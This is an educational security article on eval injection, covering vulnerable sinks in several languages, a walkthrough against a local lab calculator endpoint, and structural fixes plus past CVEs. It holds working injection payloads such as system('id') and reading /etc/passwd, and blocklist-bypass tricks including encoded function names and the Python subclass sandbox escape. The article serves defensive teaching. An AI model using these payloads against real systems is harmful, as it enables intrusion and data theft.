eval() is the dumbest version of remote code execution and it still ships in production code in 2026. The sink is one function call. The exploit is one request. The fix is not subtle. Yet every year I find at least one calculator endpoint, formula field, or "dynamic config" feature that hands a POST body straight to the language's own evaluator, then acts surprised when somebody sends system("id") instead of 2 + 2.
This is the variant deep dive under the remote code execution practitioner guide, sibling to OS command injection, argument injection, and server-side template injection. All four share the same underlying mistake (data reaches code), but eval is the one where the developer skipped the shell, the binary, and the template engine, and fed user input directly into the language runtime itself.
TL;DR
eval injection happens when an application passes user-controlled input to its language's runtime evaluator: PHP eval, Python eval/exec, JavaScript eval and the Function constructor, Ruby eval/instance_eval/class_eval, Perl eval EXPR, shell eval $cmd. The textbook sink is eval($_POST['expr']) and the textbook exploit replaces an arithmetic string with system("id"). The pattern shows up in calculator endpoints, formula fields, plugin loaders, and "dynamic config" features where the developer needed a tiny expression language and reached for the host runtime instead of writing a parser. Blocklist sanitisation (strip system, strip exec) loses every time because the host language has too many indirect call paths. The structural fix is to never invoke the runtime evaluator on untrusted input: use a real expression parser (simpleeval in Python, expr-eval in Node, a math grammar in PHP), use ast.literal_eval for literal-only data, or expose an allowlist of named operations and parse user input as a structured command.
The textbook sink
Every language has it. The shape is identical across PHP, Python, JavaScript, Ruby, Perl, and shell. The application reads a string from the request, hands it to the runtime evaluator, and the evaluator parses it as code in the host language. Nothing in between.
The canonical PHP version, lifted from the rce-basic lab's /calc.php:
$expr = $_POST['expr'];
echo eval("return $expr;");The intended use is expr=2+2, returning 4. The exploit is expr=system("id"), returning the output of id. There is no escape hatch, there is no nuance, there is no "but only if". Any PHP expression the attacker writes runs as the web user.
The same anti-pattern in every language I see regularly:
# Python
result = eval(request.form['expr']) # arbitrary expression
exec(request.form['code']) # arbitrary statements// JavaScript
const result = eval(req.body.expr); // classic
const fn = new Function('return ' + req.body.expr); // Function constructor
setTimeout(req.body.expr, 0); // string form of setTimeout
setInterval(req.body.expr, 1000); // same family# Ruby
result = eval(params[:expr])
obj.instance_eval(params[:expr])
SomeClass.class_eval(params[:expr])
# Perl
my $result = eval $expr; # string form, NOT the eval { BLOCK } form
# Shell
eval "$user_supplied_command"The shell one is especially fun because eval in a shell script is double-parsed: the shell expands variables and substitutions once when constructing the argument, then eval re-runs the resulting string through the parser. Any unescaped metacharacter in the user value gets a second chance to be interpreted as syntax.
JavaScript has the most footguns. eval itself is the obvious one. The Function constructor is eval with a slightly different scope chain (it creates a new function with the global scope as its outer scope, rather than executing in the local scope), and people reach for it thinking it is safer. It is not. setTimeout and setInterval accept either a function or a string; the string form is eval in disguise. vm.runInNewContext and vm.runInThisContext in Node are the explicit-evaluator forms. Every one runs arbitrary code if the input is untrusted.
Why developers keep reaching for eval
eval is not a stupid function. It exists because there are real cases where a program needs to run code it did not have at compile time. The mistake is the leap from "I need to evaluate an expression" to "the host language's evaluator is the right tool". Four realistic shapes I see in code review:
1. Scientific calculators and formula fields
A user wants to type 2 + 2 * sin(theta) into a form field and see a number. The developer thinks "the input is just math, what could possibly go wrong" and reaches for eval. The exploit is the difference between "math expression" and "arbitrary expression that happens to start with arithmetic". The runtime evaluator does not distinguish; it parses whatever you give it. Spreadsheet-like UIs are the same shape one layer up: formula columns wired to the host language because that is the path of least resistance.
2. Dynamic config and tiny DSLs
A config file lets non-developers customise behaviour with a little expression language. Rules engines for fraud, routing rules, alerting thresholds, feature flag predicates ("show this feature if user.tier == 'pro' and user.region in ['us', 'eu']"). The developer needs an expression evaluator, looks at how much work writing a parser is, and reaches for eval instead. The config file is "trusted" in some abstract sense, until the day it becomes editable through an admin UI, or a lower-privilege role gets write access to the config table, or it ends up loaded over HTTP from a CDN with a broken cache.
3. Plugin and extension loaders
A plugin system that loads third-party code at runtime and evals it because the developer wanted "hot reload". The plugins are "trusted" because they are written by the team, until they are written by partners, until they are user-uploaded. The eval call does not know anything about trust; it runs whatever bytes it receives.
4. Quick-and-dirty scriptable webhooks
"Customers can define their own webhook handlers and we will run them when events fire." The developer reaches for vm.runInNewContext or PHP eval or Python exec, isolates "just enough", and ships. The sandbox is the third layer behind "do not do this" and "if you do it, isolate the worker", and every sandbox built on the host runtime has had bypasses.
The common thread: the developer wanted a constrained expression language and reached for the unconstrained one because the constrained one is more work to build. The lesson is that the extra work is the actual feature, not the overhead.
Walking the lab
The rce-basic lab in the techearl-labs repo ships the laziest possible eval sink at /calc.php. Boot it:
docker compose up rce-basicIt listens on http://localhost:8085. The endpoint is documented as a "calculator" that evaluates arithmetic. The code behind it is the four-line block from earlier. The exploits:
POST /calc.php
Content-Type: application/x-www-form-urlencoded
expr=2+2
Response: 4. The intended path.
POST /calc.php
Content-Type: application/x-www-form-urlencoded
expr=system("id")
Response: uid=33(www-data) gid=33(www-data) groups=33(www-data). The unintended path, through system() reaching /bin/sh. Note that this is eval reaching system reaching the shell, three layers, all because the first one accepted a PHP expression.
POST /calc.php
Content-Type: application/x-www-form-urlencoded
expr=phpinfo()
Response: the full phpinfo() dump. Post-exploitation reconnaissance for free: PHP version, loaded modules, environment variables, file system paths, configured disable_functions, open_basedir, the lot. This is the recon equivalent of id on a Unix box; once you have eval, phpinfo() tells you the shape of the runtime you are sitting in.
Other useful payloads against the same endpoint:
expr=file_get_contents("/etc/passwd")
expr=`id`
expr=base64_decode("c3lzdGVtKCJpZCIp")
The backtick one is interesting because PHP's backtick operator is itself a shell_exec alias, so the chain is request -> eval -> backtick -> shell. The base64 one starts to hint at why blocklist sanitisation is doomed (the next section).
The "I'll sanitise eval input" anti-pattern
Once a developer realises eval(user_input) is a problem, the next instinct is to filter the input. Strip system. Strip exec. Maybe a blocklist of "dangerous keywords". This loses every time, and it loses for a structural reason: the host language has too many indirect call paths.
A short tour of PHP bypasses against a hypothetical filter that strips the literal strings system, exec, passthru, and shell_exec:
// Dynamic function name from string concatenation
${'sy'.'stem'}('id')
// Variable function via $_GET to chain another input
$f = $_GET['f']; $f('id'); // request also supplies f=system
// base64-decoded function name, then call it
$f = base64_decode('c3lzdGVt'); $f('id');
// call_user_func with a string
call_user_func('sys'.'tem', 'id');
// hex-encoded function name (PHP 7.4+)
$f = "\x73\x79\x73\x74\x65\x6d"; $f('id');
// reflection
(new ReflectionFunction('system'))->invoke('id');
// include a remote file containing the sink (when allow_url_include is on)
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOw==');Every one of these reaches system without the literal string system appearing in the input. PHP has at least a dozen ways to invoke a function by a runtime-computed name. A blocklist that tries to catch them all ends up bigger than the language spec and still loses to the next encoding trick.
Python has the same family of indirections:
# __import__ reaches os without the keyword 'os' or 'subprocess' appearing
__import__('os').system('id')
# Even better, walk the object graph from any literal
().__class__.__base__.__subclasses__() # find Popen via class hierarchy
# getattr with a computed name
getattr(__builtins__, 'ev' + 'al')('__import__("os").system("id")')
# compile + exec
exec(compile('__import__("os").system("id")', '<x>', 'exec'))The Python class-hierarchy walk (().__class__.__base__.__subclasses__()) is the canonical sandbox escape: starting from any literal, you can reach every class loaded into the interpreter, including subprocess.Popen, and then call it. This is exactly the technique that makes Jinja2 SSTI work. JavaScript is worse: it has both eval-style indirection (this['ev'+'al']('...')) and prototype-chain access ((function(){}).constructor('return process')() reaches the global process object even without eval in the input).
The structural point is the same in every language: the runtime evaluator parses the host language, and the host language has many ways to spell any given operation. A blocklist sees the literal bytes; the parser sees the operation regardless of how it was spelled. Blocklists lose because they are fighting at the wrong abstraction layer.
The structural alternatives
The fix is to not invoke the host runtime evaluator on untrusted input at all. The right tool depends on what you actually needed.
Use a real expression parser with a defined grammar
If you needed an arithmetic expression evaluator (the calculator case), use a library that parses input against a constrained grammar and rejects anything outside it. The grammar defines what is allowed; the parser refuses everything else.
# Python: simpleeval is a constrained eval with a defined grammar
from simpleeval import simple_eval
result = simple_eval("2 + 2 * sin(theta)", names={"theta": 0.5},
functions={"sin": math.sin})// Node: expr-eval is a small math expression library
const { Parser } = require('expr-eval');
const expr = Parser.parse('2 + 2 * sin(theta)');
const result = expr.evaluate({ theta: 0.5 });// PHP: a math parser library, not eval. Various options on Packagist.
$parser = new \MathParser\StdMathParser();
$ast = $parser->parse('2 + 2 * sin(theta)');
$result = $ast->accept(new Evaluator(['theta' => 0.5]));These libraries parse the input as data, validate it against a grammar, and refuse anything that does not match. system("id") is not in the grammar, so it does not parse, so it never runs. The difference from eval is structural: the unsafe version says "yes" to any host-language expression; the safe version says "yes" only to expressions that match a defined shape.
Use AST-walking for literal types
If you only needed to deserialise a Python-syntax literal (dict, list, tuple, number, string, bool, None), Python's standard library has the exact tool:
import ast
data = ast.literal_eval(request.form['data'])ast.literal_eval parses the input as a Python expression, walks the resulting AST, and only evaluates nodes that represent literal values. Any function call, attribute access, or arithmetic operation raises ValueError. It is the right tool when you want to read structured data without going through JSON.
Node has nothing exactly equivalent because JavaScript literals overlap with JSON; for most cases JSON.parse is the answer. When you need more (e.g. literal undefined or comments), there are small libraries (json5, acorn with a literal-only walker) that parse the input as an AST and refuse non-literal nodes.
Expose an allowlist of named operations
If you needed a plugin or rules system, do not let the user write code at all. Expose a small set of named operations, and parse the user input as a structured command that references those names. The user supplies the data (which operation, what arguments); the application supplies the code (the implementation of each operation).
{
"rule": "and",
"args": [
{ "rule": "eq", "args": ["user.tier", "pro"] },
{ "rule": "in", "args": ["user.region", ["us", "eu"]] }
]
}The application's rule evaluator walks the tree, looks up and/eq/in in a fixed table of allowed operations, and applies them. Anything not in the table fails closed. The user controls the shape of the rule; the application controls every operation that can run.
For more sophisticated needs, expression languages like CEL (cel-go, Google's Common Expression Language) are specifically designed for this: a constrained grammar with no side effects, intended to be evaluated against untrusted input.
Genuinely sandboxed runtimes
If after all of the above you still need to run arbitrary code from users (and this is rarer than developers think), the sandbox needs to be a real one: a separate process with no file system access, no network, no access to the host runtime, a hard time limit, a hard memory limit, and a syscall filter. vm.compileFunction in Node with parsingContext: vm.createContext({}) is a starting point, not an endpoint. The same applies to PHP Sandbox extensions and Ruby $SAFE levels (which Ruby itself deprecated and removed). Treat the sandbox as the third layer, not the primary defence.
Real-world incidents
A short tour of eval-shaped CVEs. As with the parent article, I would rather link to the NVD entries for version-specific detail than risk a stale number; the lessons are what I want to remember.
- Ruby on Rails YAML/eval, CVE-2013-0156 (January 2013). Rails before 3.2.11 / 3.1.10 / 3.0.19 / 2.3.15 parsed XML request bodies and converted YAML-typed elements via
YAML.load. Ruby'sYAML.loadon Syck/Psych deserialises arbitrary objects, including types whose initialisers run code. An attacker could send an XML body containing a YAML payload that constructed an object whose instantiation triggeredeval-equivalent code execution. Unauthenticated RCE on any Rails app accepting XML, which at the time was the default. The lesson is the deserialisation-to-eval pipeline: a parser that constructs language-native objects from attacker bytes is anevalsink wearing a costume. - node-serialize eval-on-deserialise, CVE-2017-5941 (February 2017). The
node-serializenpm package deserialised payloads of the form{"rce":"_$$ND_FUNC$$_function(){...}()"}by callingevalon the function body. Any application using it on untrusted input was an unauthenticated RCE. The pattern (deserialiser that callseval) repeated in several other small packages. - PHPUnit
eval-stdin.php, CVE-2017-9841 (June 2017). PHPUnit before 4.8.28 and before 5.6.3 shippedUtil/PHP/eval-stdin.php, a development helper that read the raw request body and passed it straight intoeval(). The file was meant to live only inside the test harness, but Composer-installed projects routinely deployedvendor/to production with the directory reachable from the web. Unauthenticated, single-request RCE against any Laravel / Symfony / Drupal / Magento site wherevendor/phpunit/phpunit/src/Util/PHP/eval-stdin.phpresolved on the public root. Still being mass-scanned years after disclosure; it is the realistic shape of how anevalsink ships to production: not in your code, but in a dev dependency you forgot to exclude from the deploy.
Across all three the pattern is the same: a developer needed dynamic behaviour and chose eval (or a deserialiser that reaches eval underneath) as the implementation. The CVEs differ in framework, language, and year; the underlying mistake does not.
Frequently asked questions
Where to go next
This article is the deep dive on the direct-evaluator variant. The siblings and the wider map:
- Up to the remote code execution practitioner guide for the full RCE taxonomy.
- Across to OS command injection for the classic
shell_execsink and the argv-array fix. - Across to argument injection for the variant that gets past
escapeshellargby abusing the called binary's own flag parser. - Across to server-side template injection for the same data-becomes-code mistake one layer up in template engines.
- Back to the web application security vulnerabilities taxonomy for the hub.
The recurring lesson across the whole RCE family is the same one. Every place untrusted input crosses into something that parses bytes as code is a sink. For eval that something is the host language's own runtime, which is as bad as it gets: no intermediate layer to harden, no shell to swap out, no template engine to sandbox. The only reliable defence is to not let the crossing happen in the first place. Parse the input as data, against a grammar you defined. Reach for the runtime evaluator only when nothing else fits, and then assume the next CVE in the list above is the one you are about to ship.
Sources
Authoritative references this article was fact-checked against.
- OWASP, Code injectionowasp.org
- CWE-95, Eval Injectioncwe.mitre.org
- PHP, evalphp.net





